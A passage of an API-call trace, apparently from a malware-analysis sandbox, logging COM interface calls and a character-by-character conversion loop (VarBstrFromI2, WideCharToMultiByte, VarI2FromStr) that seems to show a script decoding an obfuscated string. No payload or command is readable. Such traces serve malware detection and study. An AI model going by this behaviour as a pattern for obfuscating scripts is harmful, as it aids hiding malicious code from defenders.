[6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.990] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.990] IUnknown:Release (This=0x7f72500) returned 0x2 [0046.990] IUnknown:AddRef (This=0x8128768) returned 0x5 [0046.990] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.990] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.990] IUnknown:Release (This=0x8128768) returned 0x4 [0046.990] IUnknown:AddRef (This=0x81287c0) returned 0x3 [0046.991] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.991] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.991] IUnknown:Release (This=0x81287c0) returned 0x2 [0046.991] IUnknown:AddRef (This=0x7f72088) returned 0x4 [0046.991] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.991] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.991] IUnknown:Release (This=0x7f72088) returned 0x3 [0046.991] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0046.991] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.991] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.991] IUnknown:Release (This=0x7f72138) returned 0x3 [0046.991] IUnknown:AddRef (This=0x7f723a0) returned 0x7 [0046.991] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.991] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.991] IUnknown:Release (This=0x7f723a0) returned 0x6 [0046.991] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0046.991] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.991] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.991] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0046.991] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0046.991] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.991] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.991] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0046.991] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0046.991] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205808 | out: ppvObject=0x205808*=0x0) returned 0x80004002 [0046.991] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205800 | out: ppvObject=0x205800*=0x0) returned 0x80004002 [0046.991] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0046.991] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0046.992] GetUserDefaultLCID () returned 0x409 [0046.992] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*=0x0) returned 0x0 [0046.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x60\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.993] GetUserDefaultLCID () returned 0x409 [0046.993] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0046.993] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0046.994] GetUserDefaultLCID () returned 0x409 [0046.994] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0046.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="9", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x39\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.994] GetUserDefaultLCID () returned 0x409 [0046.994] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0046.994] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0046.995] GetUserDefaultLCID () returned 0x409 [0046.995] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0046.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.995] GetUserDefaultLCID () returned 0x409 [0046.995] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0046.995] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0046.996] GetUserDefaultLCID () returned 0x409 [0046.996] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0046.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x30\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x34\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.996] GetUserDefaultLCID () returned 0x409 [0046.996] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0046.996] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0046.997] GetUserDefaultLCID () returned 0x409 [0046.997] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0046.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x36\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.997] GetUserDefaultLCID () returned 0x409 [0046.997] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0046.997] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0046.998] GetUserDefaultLCID () returned 0x409 [0046.998] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0046.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x60\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.998] GetUserDefaultLCID () returned 0x409 [0046.998] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0046.998] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0046.999] GetUserDefaultLCID () returned 0x409 [0046.999] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0046.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0046.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x30\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.000] GetUserDefaultLCID () returned 0x409 [0047.000] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.000] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.000] GetUserDefaultLCID () returned 0x409 [0047.000] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="]", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5d\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.001] GetUserDefaultLCID () returned 0x409 [0047.001] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.001] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.001] GetUserDefaultLCID () returned 0x409 [0047.001] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="]", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5d\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.002] GetUserDefaultLCID () returned 0x409 [0047.002] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.002] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.002] GetUserDefaultLCID () returned 0x409 [0047.002] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x34\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="9", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x39\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.003] GetUserDefaultLCID () returned 0x409 [0047.003] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.003] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.003] GetUserDefaultLCID () returned 0x409 [0047.003] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x34\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x38\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.004] GetUserDefaultLCID () returned 0x409 [0047.004] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.004] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.004] GetUserDefaultLCID () returned 0x409 [0047.004] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x60\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.005] GetUserDefaultLCID () returned 0x409 [0047.005] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.005] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.005] GetUserDefaultLCID () returned 0x409 [0047.005] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="9", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x39\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.006] GetUserDefaultLCID () returned 0x409 [0047.006] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.006] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.006] GetUserDefaultLCID () returned 0x409 [0047.007] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5f\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.007] GetUserDefaultLCID () returned 0x409 [0047.007] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.007] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.008] GetUserDefaultLCID () returned 0x409 [0047.008] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x37\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x38\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.008] GetUserDefaultLCID () returned 0x409 [0047.008] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.008] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.009] GetUserDefaultLCID () returned 0x409 [0047.009] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x34\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.009] GetUserDefaultLCID () returned 0x409 [0047.009] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.009] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.010] GetUserDefaultLCID () returned 0x409 [0047.010] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x37\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.010] GetUserDefaultLCID () returned 0x409 [0047.010] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.010] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.011] GetUserDefaultLCID () returned 0x409 [0047.011] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x37\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x60\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.011] GetUserDefaultLCID () returned 0x409 [0047.011] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.011] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.012] GetUserDefaultLCID () returned 0x409 [0047.012] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, 